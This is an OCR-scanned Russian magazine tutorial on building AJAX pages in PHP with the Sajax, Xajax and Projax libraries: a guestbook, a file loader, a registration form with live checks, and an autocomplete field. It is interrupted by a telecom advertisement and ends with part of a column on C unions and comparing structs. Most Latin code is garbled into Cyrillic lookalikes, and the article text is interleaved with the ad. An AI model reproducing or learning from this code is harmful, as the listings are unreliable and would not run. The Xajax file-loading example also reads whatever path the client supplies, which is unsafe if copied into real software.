— как всего этого добиться. Чтобы не быть голо- 
словным, я покажутебе все это на конкретных 
примерах, часть из которыхты сможешь сразу 
использовать на своих веб-сайтах. Начнем 
с самой простой библиотеки — Заіах. 

□ Баіах 

Заіах — довольно простая библиотека, поэтому 
серверный и клиентский код мы можем (и будем :]] 
писать в одном файле. Функционал у нашей 
первой программы будеточень простым: мы на- 



жимаем кнопку, и в текстовое поле загружается 
текст, разумеется, без перезагрузки страницы. 
Для начала сделаем серверную часть, в которой 
будет экспортироваться функция, возвращаю- 
щая текст для клиента: 

СЕРВЕРНАЯ ЧАСТЬ СКРИПТА 

<? 

гедиіге ("Зазах, ріір " ) ; 

бипеСіоп 1іе11о_ѵ70г1(3 ( ) { 
геСигп "Неііо, ѵ\гог1сі! " ; 

} 

заз ах_іпіР ( ) ; 

// Раскомментировать 
// для отладочного режима: 

// $зазах_сіеЬид_шо(іе = 1; 
зазах_ехрогД ( "ЬеНо^огІй" ) ; 
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^ согііпд 




> Поле с автозавершением 




> Простейшее приложение с использованием 5аіах 



вазах_1іап(і1е_с1іепЬ;^едиезЬ ( ) ; 

?> 

Последняя строка этого скрипта автоматически 
обрабатываетзапросы клиента. 

Ну что же, перейдем к клиентской части, которой 
надо выдать НТМ И и ЗаѵаЭсгірІ (поместим мы ее 
в тотжефайл, сразу за закрывающимся тэгом РНР). 
Для автоматической генерации ЗаѵаЭсгірі мы 
воспользуемся библиотечной функцией 
5аіах_5Іпоѵѵ_іаѵа5Сгір1;(), а для асинхронной 
работы ЗаѵаЭсгірІ — определим функцию 
бо_ЬеЦо_ѵѵогІсІ, которая будет вызываться 
при нажатии кнопки, и функцию бо_Ье11о_ 
ѵѵогІсІ_саІІЬаск, которая сработает при полу- 
чении ответа сервера и положит результат 
в текстовое поле. 

Вся соль библиотеки Эаіах кроется в работе 
бо_НеІІо_ѵѵогІсІ, которая вызываетавтоматически 
сгенерированную х_НеІІо_ѵѵогІсІ. Фактически, мы 
из ЗаѵаЭсгірі вызываем функцию, которая написа- 
на на РНР и хранится на сервере, а в качестве па- 
раметра передаем ей функцию обратного вызова: 

КЛИЕНТСКАЯ ЧАСТЬ СКРИПТА 

<ЬЬт1> 

<ЬеасІ> 

<ЬіЫе>Не11о, чагогісН Ьу зАЙАХ</ 
ЬіЫе> 

<зсгірЬ> 

<?р]зр заз ах_зЬоѵ\/_заѵазсгірЬ ( ) ; ?> 

іипсЬіоп бо_Ье11о_х\гог1с1_ 
саІІЬаск (гезиІЬ) 

{ 

боситепЬ . деЬЕІетепЬВуІй 
( " геЬигп_зЬгіпд" ) .ѵаіие = гезиІЬ; 

} 

іипсЬіоп йо_Ье11о_х\гог1й ( ) 

{ 

х_1іе 1 1 о_ѵ70 гісі 

(йо_Ье11о_ѵ\гог1й_са11Ъаск) ; 

} 

</зсгірк> 

</Ьеай> 

<Ъойу> 

<іприк куре=" ЬехЬ" ій=" геЬигп_ 



зкгіпд" ѵа1ие=" Здесь будет резуль- ■ 
тат запроса" > 

<іприк куре= "ЪиЬЬоп" ѵа1ие= " Послать 
запрос» опс1іск= "йо_Ье11о_х\гог1й ( ) ; _ 
гекигп іаізе; " > 

</Ъойу> 

</ЬЬт1> 

Запустим скрипти посмотрим описание 
функции х_ИеІІо_ѵѵогІсІ, которое автоматиче- 
ски генерируется при вызове РНР-функции | 
заіах_ехрог1:(«ЬеЦо_\л/огШ»]: 

ФУНКЦИЯ Х_НЕІ_І_0_ѴѴ0РІ_0 р 
СГЕНЕРИРОВАННАЯ БИБЛИОТЕКОЙ 5А^ 

// шгаррег Рог Ъ.е11о_члгог1й 
іипсбіоп х_Ье11о_ѵ\гог1й ( ) 

{ 

заз ах_бо_са11 ( "]те11о_ѵ\гог1й" , 
х_Ье11о_члгог1й . агдитепЬз ) ; 

} 

В результате происходит прозрачный вызов 
РНР-функции, которая хранится на сервере. 
Теперь попробуем вызвать серверную функцию 
с параметрами, для чего напишем гостевую кни- 
гу, в которую сообщения будут добавляться без 
перезагрузки страницы, а отображение новых 
сообщений будет происходить автоматически. 
Для простоты я предположу, что у нас есть АРІ 
для работы с сообщениями. Это можетбыть 
программный интерфейс к базе данных или 
ХМб-хранилищу. В нем нам нужны 3 функции: 

/ / печать всех сообщений в виде НТМЬ 
шеззадез_арі_ргіпб_шеззадез ( ) ; 

// добавление сообщения 
теззадез_арі_айй_теззаде ($теззаде) ; 

/ / возврат всех сообщений в виде НТМЬ 
шеззадез_арі_деЬ_шеззадез ( ) ; 

Теперь напишем серверную часть, в которой из- 
менится только описание функции и ее экспорт: 

СЕРВЕРНАЯ ЧАСТЬ СКРИПТА 

<? 

гедиіге ( " Заз ах . рЬр " ) ; 



Ргоіах 

ѵтѵѵ.пдсосІегБ.сот/ргоіах 



Ртіах представляет собой порт проекта 
Рготіуре, который был первоначально написан 
для КиЪу оп Каііз и проекта зсгірьасиіо.ш. 

Такой мощный функционал объясняет общий 
размер клиентской части — более 170 Кб 
кода ІаѵаЗсгірі;. За эти «деньги» мы получаем 
полную «корзину фруктов» — от манипуля- 
ций с ЭОМ до визуальных эффектов. Ргтцах 
идеально подходит для «суперинтерактив- 
ных» проектов, например, онлайн-игр, где 
нужен мощный функционал на стороне 
пользователя. Минусом опять же является 
некоторая сложность этой библиотеки, кото- 
рую ты, конечно, не заметишь, если раньше 
работал с Ргоіоіуреи зсгірьасиіо.из 

гедиіге ( "шеззадез_арі . рЬр" ) ; 

іипсЬіоп айй_теззаде ( $шеззаде) { 
те з з аде з_ар і_айй_те з з аде 
($теззаде) ; 
гебигп 

теззадез_арі_деЬ_теззадез ( ) ; 

} 

за^ах_іпіЬ ( ) ; 

за^ах_ехрогЬ ( "айй_теззаде" ) ; 

зазах_Ьапй1е_с1іепЬ_гедиезЬ ( ) ; 

?> 

На стороне клиента у нас будет поле для ввода 
текста и кнопка для отправления. Сообщения 
будут отображаться ниже: 

КЛИЕНТСКАЯ ЧАСТЬ СКРИПТА 

<ЬЬт1> 

<Ьеай> 

<ЬіЫе>Гостевая книга Ьу зАЙАХ 

</ЬіЫе> 

<шеба ЬЬЬр-едиіѵ= "СопЬепЬ-Туре" 

сопЬепЬ= " ЬехЬ/ЬЬтІ ; сЬагзеЬ=иЬі- 

8 " / > 

<зсгірЬ> 

<?рЬр зазах_зЬоѵ^_заѵазсгірЬ ( ) ; ?> 
іипсЬіоп йо_айй_теззаде_ 
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^ собіпд 




>Форма регистрации 



саІІЬаск (гезиік ) 

{ 

сіоситепк . деСЕІетепкВуІсІ ( "теззаде 
з") .іппегНТМЬ = ипезсаре (гезиік) у 
} 

іипсСіоп с!о_ас1(і_теззаде ( ) { 

теззаде = сіоситепк . деЬЕІетепЬВуІсІ 
("теззаде") . ѵаіие; 
х_ас!с1_теззаде (теззаде, 

с!о_ас1с1_теззаде_са11Ьаск) ; 

} 

</зсгірк> 

</1іеасі> 

<Ъос1у> 

<ЬехЬагеа ісі= "теззаде " > 
</ЬехЬагеахЪг/> 

<іприк куре= "Ьиккоп" 

ѵа1ие= "Отправить" опс1іск= " сіо_а(і(і_ 

теззаде ( ) ; гекигп іаізе; "> 

<Ъ.г /> 

<с1іѵ іс1= "теззадез " > 

<?ркр 

теззадез_арі_ргіпк_теззадез ( ) ; 

?> 

</с1іѵ> 

</Ьосіу> 

</іЩт1> 

При нажатии на кнопку «Отправить» вызы- 
вается функция х_асИ_ппе55аде, которой 
в качестве параметра передается не только 
функция обратного вызова, но и содержимое 
текстового поля. Надеюсь, внимательный чи- 
татель обратил внимание и на вызов функции 
ипезсареігезии) для нормального отображения 
кириллических символов. Если нетжелания 
каждый раз вызывать ее, можно пропатчить 
саму библиотеку. 



ОХаіах 

Несмотря на то что эта библиотека чуть мощнее 
предыдущей, работать с ней не намного слож- 
нее. Чтобы быстро войти в курс дела, посмот- 
рим, какможно с помощьюХаіах загрузить файл 
по нажатию кнопки: 

ЗАГРУЗКА ФАЙЛА ПРИ ПОМОЩИ ХАбАХ 

<?рЬр 

гедиіге ( 1 хаб ах . іпс . ріір ' ) ; 

іипсСіоп ІоасІЕіІе ( $:Еі1е) 

{ 

$оЬз'Кезропзе = печл/ 
хаз ахКезропзе ( ) ; 
$оЪз'Кезропзе->ас1сІАззідп ( 

"гезиІЬ" , 

" іппегНТМЬ " , 

іі1е_деЬ_сопЬепЬз ( $іі1е) ) ; 
$оЬзКезропзе->ас!сІАззідп ( 

" гезиІЬ" , " зкуіе . ѵізіЬіІіЬу " , 

' ѵізіЫе ' ) у 
геіигп $оЬзКезропзе; 

} 

$хаз'ах = пет/ хазах() ; 

// Раскомментировать для отладки 
/ / $хаз ах- хіеЪидОп ( ) ; 

$хаз ах->гедізЬегЕипсЬіоп 
( " ІоасІЕіІе" ) ; 

$хаб ах->ргосеззКедиезЬз ( ) ; 

?> 

<ЪЬт1> 

<кеас1> 

<ЬіЫе>Загрузка файла</ЬіЫе> 

<теЬа ЬЬЬр-едиіѵ= " СопЬепЬ-Туре " 
сопЬепЬ= "ЬехС/НЬтІ ; сЬагзеЬ=иЬі- 
8 " / > 

<?рЬр $хазах->ргіпЬЦаѵазсгірЬ ( ' ' ) ; 
?> 



</Ьеасі> 

<Ьосіу зЬу1е= " ЬехЬ-аІідп : сепЬег;«> 
<ЬиЬЬоп опс1іск= "хаз ах_ 

ІоасІЕіІе ( ' іііе . сіака ' ) " >3агрузить 
файл< /ЬиЬЬоп> 

«ііѵ зку1е= "Ьогсіег : Ірх зоіісі 
Ыаск; ѵізіЪіІіку : Ьіскіеп; " 
ісі= " гезиік " ></сііѵ> 

<Ьг/> 

</Ьосіу> 

</ЬЬт1> 

Первое, что бросается в глаза при прочтении 
кода, — поддержка ООП в Хаіах, ведь мы работа- 
ем не с функциями, а с классами и объектами, 
которые при желании можно расширить. Общая 
схема работы аналогична Заіах, по-другому идет 
разве что отправка ответа с сервера клиенту 
— для этого используется объектфоЬІПезропзе 
класса хаіахПезропве. Я использовал метод 
аббАзБІдп, который ищет объект НТМ І_ с за- 
данным іб и определенному полю присваивает 
нужное значение. То есть мы можем не только 
прозрачно вызывать серверные функции на 
клиенте, но и прозрачно модифицировать НТМЕ 
с сервера (и добавлять баѵаЗсгірі). 

Кстати, помнится, я обещал продемонстри- 
ровать, как надо разделять АбАХ-систему на 
клиента и сервер. Настало время исполнить 
обещание, а заодно — показать, какХаіахумеет 
автоматически отсылать формы на сервер. 

На каждом сайте, который поддерживает созда- 
ние сетевого сообщества, имеется процедура 
регистрации с помощью специальной формы. 
Чтобы зарегистрироваться, надо потратить 
немало сил: то пароль слишком легкий, то логин 
занят — проще просто бросить это дело. 
Попробуем сделать эту процедуру безболезнен- 
ной, быстрой и интерактивной. 

Логин, введенный пользователем, должен быть 
незанятым и отвечать некоторымтребованиям, 
например состоять более чем из трех символов. 
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> Загрузка файла вХаіах 



На пароль мы наложим только ограничение по длине: 6 
символов. Дополнительные проверки можешь придумать 
сам — все зависит от твоей фантазии ;]. Вся система будет 
содержать 3 файла: 

• гедівіег.соттоп.рЬр - общий функционал для клиента и 
сервера; 

• гедізіег.зегѵег.рЬр - серверная часть для проверки логина, 
пароля и обработки формы; 

• гедізіег.рЬр - клиентская часть с интерактивной формой 
ввода. 

Начнем с общей части для клиента и сервера, в которой 
будут регистрироваться 3 функции для проверки логина, 
пароля и для приема данных с клиента. Поскольку сервер- 
ная часть будету нас в отдельном файле, это надо указать 
в конструкторе объекта $хаіах: 

КЕЗІЗТЕК.СОММОМ.РНР 

<?рЬр 

гедиіге ( 1 хад ах . іпс . рЬр ' ) ; 

$ха^ах = пем хаз ах 

( " гедізбег . зегѵег . ркр" ) ; 

// Раскомментировать для отладки 
/ / $хаз ах- хіеЬидОп ( ) ; 

$хазах->гедізСегРипсСіоп ( " сЬескІІзегЫате" ) ; 
$хаз ах->гедізбегРипскіоп ( " скескИзегРазз " ) ; 
$хад ах->гедізкегРипскіоп ( " зиЬтіСРогт" ) ; 

$хад ах->ргосеззКедиезСз ( ) ; 

?> 

Функции для проверки я предлагаю описать отдельно, 
так как они будут вызываться у нас в двух случаях: когда 
форма будет передана на сервер и когда по мере набора 
текста пользователем будет происходить автоматическая 
проверка: 

ФУНКЦИИ ДЛЯ ПРОВЕРКИ ЛОГИНА И ПАРОЛЯ 
(ВЕ0І5ТЕВ.5ЕВѴЕВ.РНР) 

бипсбіоп ізІІзегЫашеСоосЗ ( $изегЫаше) 

{ 

//Их надо брать из базы ; ) 

$изегз = аггау ( "Ьііі " , "зоЬп", "ѵазуа"); 
іб ( збгіеп ( $изегЫаше) <= 3 ) 

гебигп аггау (Раізе, "Имя пользователя 
должно быть длиннее трех символов") ; 

богеасЬ. ($изегз аз $изег) 
іб ($изег == $изегЫаше) 

гебигп аггау (баізе, "Имя пользователя 
уже используется" ) ; 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение: 



ТЕЛЕФОН 



ИНТЕРНЕТ 

ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 



■Подключение - В любом Месте Москвы И Московской обл. 

«Срок я о д к л юч о м и л о Моек ВО - 14 дней, 
в московской об л, - от 14 до за днеи н 

«Устамоока прямого московского телефонного номера 

■ Многоканальные телефонные номере 

*ЗР~телефоння 

«Выделенные Линин Интерне? 
«Корпоративные мастные сети (ѴРМ) 

■Хостинг, услуги ОаІа-ценТра 



РЯД Телеком 
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геСигп аггау (Ьгие , "Имя пользова- 
теля подходит" ) ; 

} 

іипсііоп ізІІзегРаззСоосі ( $изегРазз) 

{ 

$оЪзКезропзе = пеѵі 
хаз ахКезропзе ( ) ; 

іі ( зЬгІеп ( $изегРазз ) <= б) 
геЬигп аггау ( іаізе , 

"Пароль должен быть длиннее 
шести символов" ) ; 

геіигп аггау(Ьгие, «Пароль 
подходит») ; 

} 

Обе функции возвращают 2 знамен ия, 
первое имеетбулевский тип и определяет, 
подходятли логин и пароль соответственно, 



Баіах ™ — — — — 

ѵтѵу.тогіегптеІИогі.сот/заіах 



$а)ах (Зітріе Д]'ахТоо1кіі;) — это простая 
библиотека для создания АІАХ-приложений 
на РНР путем прозрачного вызова серверных 
функций с клиента. Общий вес клиентского 
и серверного кода составляет чуть меньше 
9 Кб, что делает библиотеку незаменимой 
для небольших и быстрых приложений. 

Ее можно посоветовать использовать тем, 
кто собирается переделывать свое АіАХ-при- 
ложение без использования фреймворков, 
поскольку Заз ах — довольно низкоуровневая 
библиотека, не содержащая лишних наворо- 
тов. В комплект поставки входят фреймвор- 
ки для следующих языков: АЗР, СоЫ Ризіоп, 
Іо, Ьиа, Регі, РНР, РуіЬоп н КиЪу. К минусам 
библиотеки можно отнести некорректную 
работу с кириллицей (правда, проблема 
довольно просто решается). 



а второе содержит пояснительный текст. 
Теперь реализовать функции, которые будут 
вызываться клиентом, не составит труда: 

ФУНКЦИИ, КОТОРЫЕ БУДУТ ВЫЗЫВАТЬСЯ 
ИЗ МѴА5СВІРТ (ВЕѲІ5ТЕВ.5ЕВѴЕВ.РНР) 

іипсЬіоп сЬ.ескІІзегЫаше ( $изегЫаше) 

{ 

$оЪз'Кезропзе = пеѵі 
хаз ахКезропзе ( ) ; 

ІізЬ ( $ізЬзегМатеСоосІ, $теззаде) 

= ізІІзегЫатеСооб ($изегЫате) ; 

$оЪз'Кезропзе->аскІАззідп ( 
"изегЫатеОк" , " іппегНТМЬ " , 
$теззаде) ; 

геСигп $оЬзКезропзе; 

} 

іипсЬіоп сЬескЬзегРазз ($изегРазз) 

{ 

$оЬзКезропзе = пеы 
хаз ахКезропзе ( ) ; 

ІізЬ ( $ізЬзегРаззСоос1, $шеззаде) 

= ІзІІзегРаззСоосі ( $изегРазз) ; 

$оЬз'Кезропзе->асі(іАззідп ( 
"изегРаззОк" , "іппегНТМЬ", 
$теззаде) ; 

геСигп $оЬзКезропзе; 

} 

Отмечу, что результату меня помещается 
в специальные ячейки в таблице 
с айдишниками — ивегЫатеОк 
и изегРаззОк, которые мы опишем 
на стороне клиента. И последнее, что 
нам осталось сделать на сервере, — 
это создать функцию, которая будет 
обрабатывать данные из формы для 
регистрации пользователя. Все 
содержимое передается этой 
Іфункции в виде параметра, который пред- 
ставляет собой ассоциативный массив 
(аналог $_Р05Т и $_ѲЕТ): 



ФУНКЦИЯ ДЛЯ ОБРАБОТКИ ФОРМЫ 
{ВЕЗІ5ТЕВ.5ЕВѴЕВ.РНР) 

іипсііоп зиЬшіЬРогш ( $іогшБаЬа) 

{ 

$оЬзКезропзе = пеы 
хаз ахКезропзе ( ) ; 

ІізЬ ( $ізЬзегМатеСооб, 

$теззаде) = ізЬзегМатеСоос! ( 
$ТогтБаЬа [ ' изегЫате ']); 

$оЬзКезропзе->аббАззідп 

( " гезиІЬЬіѵ" , "іппегНТМЬ" , 
$теззаде) ; 

ІізЬ ( $ізЬзегРаззСооб, 

$теззаде) = ізЬзегРаззСооб ( 
$іогтБаЬа [ ' изегРазз ' ] ) ; 

$оЬз Кезропзе->аббАррепб ( 

" гезиІЬБіѵ" , "іппегНТМЬ", 
"<Ьг/>" . $теззаде) ; 

іі ($ізЬзегМатеСооб && 
$ізЬзегРаззСооб) 

$оЬз Кезропзе->аббАррепб ( 

" гезиІЬЬіѵ" , "іппегНТМЬ", 

" <Ьг / >< з Ь г опд>Регистрация 
прошла успешное/ зЬгопд>" ) ; 

еізе 

$оЬз'Кезропзе->асі(іАррепб ( 

" гезиІЬБіѵ" , "іппегНТМЬ", 

" <Ьг / >< з Ь г опд>Регистрация 
завершилась неудачей</зЬгопд>" ) ; 

геіигп $оЬзКезропзе; 

} 

Обрати внимание, что в этих скриптах я нигде 
не использую базу данных или любое другое 
постоянное хранилище, чтобы код не потерял 
ясность. В реальныхусловиях при успеш- 
ной регистрации пользователя обязательно 
надо сохранять его данные, да и получать 
список пользователей надо тоже из какого-то 
хранилища. Теперь напишем клиентский код, 
который будет описывать форму регистрации. 
Чтобы браузер отправил форму без переза- 
грузки страницы, нужно «обнулить» (точнее, 
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^ согііпд 



«завойдить» :)) параметр асйоп у формы 
и прописать событие опзиЬтй. При этом 
событии будет вызвана ЗаѵаЗсгірІ-функция 
хаіах_БитЬііРогт, которая является оберт- 
кой нашей серверной функции виЬтііРогт, 
а параметром будут как разданные формы. 
Проверка данных формы во время их набора 
пользователем осуществляется при помощи 
вызова соответствующих функций по событию 
опкеуир: 

КЛИЕНТСКИЙ КОД (КЕ6І5ТЕК.РНР) 

<?рЬр 

гедиіге ( ' гедізкег . сошшоп . ркр 1 ) ; 

?> 

<1Щт1> 

<кеасЬ> 

<кік1е>Регистрация пользователя 
</Ьі1і1е> 

<шеСа Ыікр-едиіѵ= "Сопкепк-Туре" 
сопкепР= " Рехк/кРтІ ; сЬагзеС=и1іЕ- 
8 " / > 

<?рЬр $хаз ах->ргіпкбаѵазсгірр ( ' ' ) ; 
?> 

<зсгірк Руре= " Рехк/з аѵазсгірк " > 

РипсРіоп зиЪтіРРогт() { 

хазах. $ ( ' зиЪтіР ' ) . бізаЫес1=Ргие; 
ха з ах . $ ( ' зиЪтіР ' ) . ѵа1ие= " Регис- 
трируется пользователь. . . " ; 
хаз ах_зиЪтіРРогт ( 

хаз ах . деРРогтѴаІиез ( 
"гедізРгаРіопРогт" ) ) ; 
геРигп Раізе; 

} 

</зсгірР> 

</Ьеас1> 

<Ъос1у> 

<Рогт ісІ= " гедізРгаРіопРогт" 
асРіоп= " з аѵазсгірр : ѵоісі (пиіі ) ; " 
опзиЪтіР= " зиЪтіРРогт ( ) ; " > 

<РаЫе Ьогс1ег="1» ѵ\/іс!р]т= " 5 0% " > 

<Рг> 

<РЬ ѵ\/ісір]т= " 40% " >Имя пользователя 
</Рб> 

<Рб><іприР опкеуир= "хаз ах_ 
скескбзегЫате ( РЬіз . ѵаіие) " 
куре=" РехР" іб= "изегЫате" 
пате= "изегЫате " /></Рб> 

</Рг> 

<Рг> 

<Рб ісЗ.= "изегЫатеОк" со1зрап="2"> 
&пЪзр; </РсІ> 

</Рг> 

<Рг> 

<РЬ ѵ\/ісір]т= " 40% " >Пароль</Рс1> 



<Рб><іприР Руре=" РехР" опкеуир= 

"хаз ах_сЬ.ескШег Разе (кМз . ѵаіие) " 
іс!= "изегРазз " пате= "изегРазз " 
/></РсІ> 

</Рг> 

<Рг> 

<Рб. ісЗ_= "изегРаззОк" со1зрап= " 2 " I 
&пЪзр; </Рс1> 

</Рг> 

<Рг> 

<Рб>&пЪзр ; < / РсІ> 

<Рб><іприР Руре= " зиЪтіР " 

іс!=" зиЪтіР" ѵа1ие= " ЗиЬтіР " /></Рб> 

</Рг> 

</РаЫе> 

ссііѵ ісІ= " гезиІРБіѵ" >&пЬзр; </с!іѵ> 
</Рогт> 

</Ъосіу> 

</ЬРт1> 

О Ргоіах 

Настало время десерта — самой мощной 
библиотеки в нашем обзоре. Я покажу ее воз- 
можности на очень распространенном сейчас 
виджете — поле ввода с автозавершением 
(а-ля Ѳоодіе Зиддезі]. 

Для этого у нас есть все необходимое, 
остается только подкл ючить 2 а ѵа 5с про- 
файлы и вызвать метод іех1_беІсІ_ѵѵііЬ_ 
аійо_сотрІе1е — на этом клиентская часть 
заканчивается. 

КЛИЕНТСКИЙ КОД — «ПОЛЕ ВВОДАС 
АВТОЗАВЕРШЕНИЕМ» 

<?ркр 

іпсіисіе (©ргозах.ркр©) ; 

$ргозах= пеѵ-/ Ргодах ( ) ; 

?> 

<Ь.Рт1> 

<1теасі> 

<теРа 1тРРр-едиіѵ= " СопРепР-Туре© 
сопРепР= " РехР/ЬРтІ ; с1іагзеР=иРР- 
8 " / > 

< С і Сіе Демонстрация автозавершения 
Ьу Ргоз ах</РіРІе> 

<зсгірр згс= " з з/ргоРоРуре . з з " 

Руре= " РехР/з аѵазсгірр " ></зсгірР> 
<зсгірр згс= " з з/зсгіркаси1оиз . 33 " 
Суре= " РехР/з аѵазсгірр " ></зсгірР> 
</Ьеас1> 

<Ъос1у> 

Введите имя пользователя: <Ъг /> 

<? = $ргоз ах->РехР_Ріе1сЦл/і РЬ_ 
аиРо_сотр1еРе ( 1 пате ' , пиіі , 
аггау ( ' игі ' => ' деР_патез . ркр '});?> 
</Ьосіу> 

</Ь.Рт1> 



Хаіах 

ѵѵѵѵѵѵ.ха|ахргоіес1.огд 



Для 90% всех веб-проектов хватит библио- 
теки Ха)ах, которая обеспечивает полно- 
стью прозрачное взаимодействие клиента 
и сервера (причем в обе стороны) . Размер 
клиентской части в сжатом виде составляет 
15 Кб, что вполне приемлемо для библиотеки 
с таким функционалом. В дистрибутив входят 
примеры (в том числе ХИЬ-приложение для 
МогШа Рігеіох) и тесты для этой библиотеки. 
Кроме того, хочу отметить наличие в интер- 
нете большого количества документации 
и сообщества, которое сложилось вокруг 
этого проекта. По моему очень скромному 
мнению, эта библиотека является наиболее 
сбалансированной по параметрам «функци- 
онал» и «легкость использования». Выбор 
редакции, так сказать ;) . 

Серверная часть будет просто печатать список 
строк, в котором есть подстрока, набранная 
пользователем: 

СЕРВЕРНАЯ — «ПОЛ Е ВВОДА С АВТОЗА- 
ВЕРШЕНИЕМ» (0ЕТ_МАМЕ5.РНР) 

<?рЬр 

// Имена пользователей берутся 

//из базы 

$пашез = аггау ( 'Ьогіз' , 

1 ѵазуа ' , ' Ы11 ' ) ; 

РогеасЪ. ( $пашез аз $пате) 

$геР_ѵаі . = ( зРгзРг ( $пате , $_ 

РОЗТ [ ' пате ' ] ) ) ? ' <1і> ' . $пате . ' </ 

1і> ' : ' ' ; 

есЬ.о ' <и1>' . $геР_ѵа1 . ' </и1>'; 

?> 

Как видишь, всего несколько строк кода 
— и мы уже у цели (посмотри на скрин «Поле 
с автозавершением» и возрадуйся — у тебя 
будеттакой же :)). 

О І_е Ріп 

В этой статье мы рассмотрели 3 библиотеки, 
которые позволяют быстро писать эффективные 
приложения в связке РНР и ДаѵаЗсгі рі, реали- 
зуя таким образом методологию АЗАХ. Каждая 
из этих библиотек имеет как плюсы, так и мину- 
сы, которые надо знать, чтобы выбрать нужную 
из них для конкретного проекта. Поэтому мой 
вердикт таков — срочно бери с диска библио- 
теки и материалы к этой статье и ковыряй их до 
выхода в свет следующего «Кодинга» :). □С 
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ТРЮКИ 



ПРОГРАММЕРСКИЕ ТРЮКИ И ФИЧИ 



ОТ КРИСА КАСПЕРСКИ 



ОТ КРЫСА 



Как известно, денно и нощно Крыс сидит в своей норе и точит программное обеспе- 
чение. Поточит-поточит да и напишет статейку. Для чего же он это делает? А все для 
того, чтобы ты, дорогой читатель «X», не крутился как белка в колесе и не наступал 
на грабли, на которые мыщъх уже успел наступить. 



ипіопз ѵз нецензурный 
кастинг 



Типизация, призванная оградить про- 
граммиста от совершения ошибок, хорошо 
работает лишь на бумаге, а в реальной жизни 
порождает множество проблем (особенно 
при низкоуровневом разборе байтов), ре- 
шаемых с помощью явного преобразования 
типов или, другим словами, «кастинга» (от 
английского «сазбпд»), например, так: 



іпС *р ; сЪаг х; 



х = * ( ( (сЪаг* ) р)+3); //получить 
байт по смещению 3 от ячейки *р 



Типизация была серьезно ужесточена в 
приплюснутом Си, вследствие чего количес- 
тво операций явного преобразования резко 
возросло, захламляя листинги культивируя 
порочный стиль программирования. 
Рассмотрим следующую ситуацию: 



ЖЕСТКАЯ ТИПИЗАЦИЯ ПРИПЛЮСНУТОГО 
СИ ТРАКТУЕТ ПОПЫТКУ ПЕРЕДАЧИ ѴОШ* 
ВМЕСТО СНАК* КАКОШИБКУ 

ТОО ( *х) ; //функция, ожидаю- 

щая указателя на сЪаг 



ѵоісі* Ъаг (); //функция, возвра- 
щающая обобщенный указатель ѵоісі 



ТОО (Ъаг ()); //ошибка! Указатель 
на сЪаг не равнозначен указателю 
ѵоісі* 



Компилятор, сообщив об ошибке приведе- 
ниятипов, остановиттрансляцию. Что здесь 
плохого? А то, что у программиста вырабаты- 
вается устойчивый рефлекс преобразовывать 
типы всякий раз, когда их не может проглотить 
компилятор, совершенно необращая внима- 
ния на их «совместимость», в результате чего 
константы сплошь и рядом преобразуются 
в указатели, а указатели — в константы со 
всеми вытекающими отсюда последствиями. 
Но по-другому программировать просто не 
получается! Различные функции различных 
библиотек по-разному объявляют физически 
идентичные типы переменных, так что от пре- 
образования никуда неуйти, а ограничиться 
одной конкретной библиотекой все равно 
не получится. Платформа .ЫЕТ выглядит 
обнадеживающе, но... похожая идея (объять 
необъятное) уже предпринималась не раз и 
недва и всякий раззаканчиваласьесли не 
провалом, то разводом и девичьей фамилией. 
Взятьхотя бы МРС... и попытаться прикрутить 
ее к чему-нибудь еще, например, кАРІ-функ- 
циям операционной системы. Преобразова- 
ний там будет... 

Но частые преобразования очень напрягают, 
особенно если их приходится выполнять над 
одним итем же набором переменных. В этом 
случае можно (и нужно) использовать объеди- 
нения, объявляемые ключевым словом 
«ипіоп»и позволяющие«легализовать»опе- 
рации между разнотипными переменными. 

С использованием объединений наш код 
будет в ы глядеть та к: 



Здесь функция ГОО при ни мает указатель на 
сбаг, а функция Ьаг возвращает обобщенный 
указатель ѵоісі*, который мы должны передать 
функции ГОО, но... мы не можем этого сделать! 



сЪаг *рЪ; //указатель на сЪаг 

} РРР; 



//элегантный уход от кастинга 
ррр . рі = р ; х = * (ррр . рЪ + 3 ) ; 



ИСПОЛЬЗОВАНИЕ АНОНИМНЫХ ОБЪЕДИ- 
НЕНИЙВ С++ ИЗБАВЛЯЕТ НАС ОТ 
КАСТИНГА, НО ДЕЛАЕТ ЛОГИКУ РАБОТЫ 
КОДАМЕНЕЕ ОЧЕВИДНОЙ 



ипіоп { /* декларация анонимного 
объединения * / 

/ / обобщенный указатель ѵоіб* 
ѵоісі *ѴОІБ; 

/ /указатель на сЪаг 
с Ъаг * СНАК ; 



Ь г 



/ ; г і * 
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ИСПОЛЬЗОВАНИЕ ОБЪЕДИНЕНИИ В СИ 
ДЛЯ ИЗБАВЛЕНИЯ ОТЯВНОГО ПРЕОБРА- 
ЗОВАНИЯ ТИПОВ 

/ * декларация объединения * / 
ипіоп ріпб2сЪаг { 

іпб *рі ; //указатель на іпб 



/ /уход от кастинга 
ѴОІБ = Ъаг () ; І00 (СНАК) ; 



/ / объявление остальных переменных 
іпС *р ; с Ъаг х; 



Г^І 



На первый взгляд, варианте объединения- 
ми даже более громоздкий, чем без 
них, но объединение достаточно объявить 
единожды, а потом использовать сколько 
угодно раз, и с каждым разом приносимый 
им выигрыш будетувеличиваться, не говоря 
уже отом, что избавление отявных преобра- 
зований улучшают читабельность листинга. 
Приплюснутый Си идетеще дальше и 
поддерживает анонимные объединения, 
которые можно вызвать без объявления 
переменной-костыля, которой вданной 
случае является ррр. Переписанный листинг 
выглядиттак: 









^ л* 



Анонимные объединения элегантно 

избавляют нас от кастинга, но, 

вто же самое время, затрудняют чтение 








листинга, поскольку из констру- 
кции «ѴОЮ = Ьаг (); ТОО (С НАР);» совер- 
шенно не очевидно, что функции 
ТОО передается значение, возращенное 
Ьаг. Не видя объединения, можно поду- 
мать, что ѴОЮ и С НАР — это две разные 
переменные, 

когда, на самом деле, это одна физическая 
ячейка памяти. 

В общем, получается замкнутый круг, выхода 
из которого нет... 



Сравнение структур 



нее есть. Следовательно, побайтовое сравне- 
ние структур абсолютно надежно. Главное, не 
забывать об инициализации «дыр», которая в 
общем случае делается так: 



В языке Си отсутствуют механизмы срав- 
нения структур, и все учебники, которые 
мыщъхутолько доводилось курить, пишут, 
что структуры вообще нельзя сравнивать, во 
всяком случае побайтово. Поэлементно 
можно, но это неуниверсально (так какдля 
каждой структуры приходится писать свою 
функцию сравнения), не производительно и 
вообще не по-хакерски. 

Чем мотивирован запрет на побайтовое 
сравнение структур? А тем, что компиляторы по 
умолчанию выравнивают элементы структуры 
по кратным адресам, обеспечивая минималь- 
ное время доступа кданным. Величина вырав- 
